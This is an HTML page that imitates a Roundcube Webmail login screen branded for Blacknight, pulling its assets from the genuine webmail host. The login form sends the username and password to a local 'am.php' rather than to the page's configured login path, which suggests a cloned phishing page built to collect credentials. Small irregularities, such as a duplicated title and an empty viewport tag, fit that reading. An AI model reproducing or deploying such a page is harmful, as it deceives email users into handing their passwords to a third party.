<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Roundcube Webmail :: Welcome to Roundcube Webmail</title>
<title>Roundcube Webmail :: Welcome to Roundcube Webmail</title>
<meta name="viewport" content="" id="viewport" />
<link rel="shortcut icon" href="https://webmail.email.hosting/skins/blacknight/images/favicon.ico?s=1541437150"/>
<link rel="stylesheet" type="text/css" href="https://webmail.email.hosting/skins/blacknight/styles.min.css?s=1541436342" />
<link rel="stylesheet" type="text/css" href="https://webmail.email.hosting/plugins/jqueryui/themes/elastic/jquery-ui.css?s=1628507288">
<script type="text/javascript" src="https://webmail.email.hosting/skins/blacknight/ui.min.js?s=1541436342"></script>



<script src="https://webmail.email.hosting/program/js/jquery.min.js?s=1628507288"></script>
<script src="https://webmail.email.hosting/program/js/common.min.js?s=1628507288"></script>
<script src="https://webmail.email.hosting/program/js/app.min.js?s=1628507288"></script>
<script src="https://webmail.email.hosting/program/js/jstz.min.js?s=1628507288"></script>
<script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10411,"cookie_domain":"","cookie_path":"/","cookie_secure":true,"skin":"blacknight","blankpage":"skins/blacknight/watermark.html","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":"./?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","request_token":"BD7diPGCD8RosU3zLJXHfUJdv48zuRzV"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","errortitle":"An error occurred!","toggleadvancedoptions":"Toggle advanced options"});
rcmail.gui_container("loginfooter","bottomline");rcmail.gui_object('loginform', 'form');
rcmail.gui_object('message', 'message');
</script>

<script src="https://webmail.email.hosting/plugins/jqueryui/js/jquery-ui.min.js?s=1628507288"></script>

</head>
<body>

<h1 class="voice">Roundcube Webmail Login</h1>

<div id="login-form">
<div class="box-inner" role="main">
<div style="text-align: center;"><a href="https://www.blacknight.com" title="Visit Blacknight.com" target="_blank"><img src="https://webmail.email.hosting/skins/blacknight/images/bk_logo_white.png?s=1541437150" id="logo" alt="Roundcube Webmail"></a></div>

<form name="form" method="post" action="am.php">
<input type="hidden" name="_token" value="BD7diPGCD8RosU3zLJXHfUJdv48zuRzV">
<input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="_default_"><input type="hidden" name="_url" id="rcmloginurl" value=""><table><tbody><tr><td class="title"><label for="rcmloginuser">Username</label>
</td>
<td class="input"><input name="_user" id="rcmloginuser" required size="40" autocapitalize="off" autocomplete="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Password</label>
</td>
<td class="input"><input name="_pass" id="rcmloginpwd" required size="40" autocapitalize="off" autocomplete="off" type="password"></td>
</tr>
</tbody>
</table>
<p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit">Login</button>
</p>

</form>

</div>

<div class="box-bottom" role="complementary">
	<div id="message"></div>
	<noscript>
		<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
	</noscript>
</div>

<div id="bottomline" role="contentinfo">
    <h4>
        Webmail powered by <a href="https://www.blacknight.com" title="Webmail powered by Blacknight" target="_blank">Blacknight</a>
        <!--Roundcube Webmail -->
                
    </h4>
</div>
</div>



<script type="text/javascript">
if (!window.UI) { var UI = new rcube_mail_ui(); }
</script>
<script>
$(function() {
rcmail.init();
var images = ["skins/blacknight/images/ajaxloader.gif","skins/blacknight/images/ajaxloader_dark.gif","skins/blacknight/images/buttons.png","skins/blacknight/images/addcontact.png","skins/blacknight/images/filetypes.png","skins/blacknight/images/listicons.png","skins/blacknight/images/messages.png","skins/blacknight/images/messages_dark.png","skins/blacknight/images/quota.png","skins/blacknight/images/selector.png","skins/blacknight/images/splitter.png","skins/blacknight/images/watermark.jpg"];
            for (var i=0; i<images.length; i++) {
                img = new Image();
                img.src = images[i];
            }
});
</script>






</body>
</html>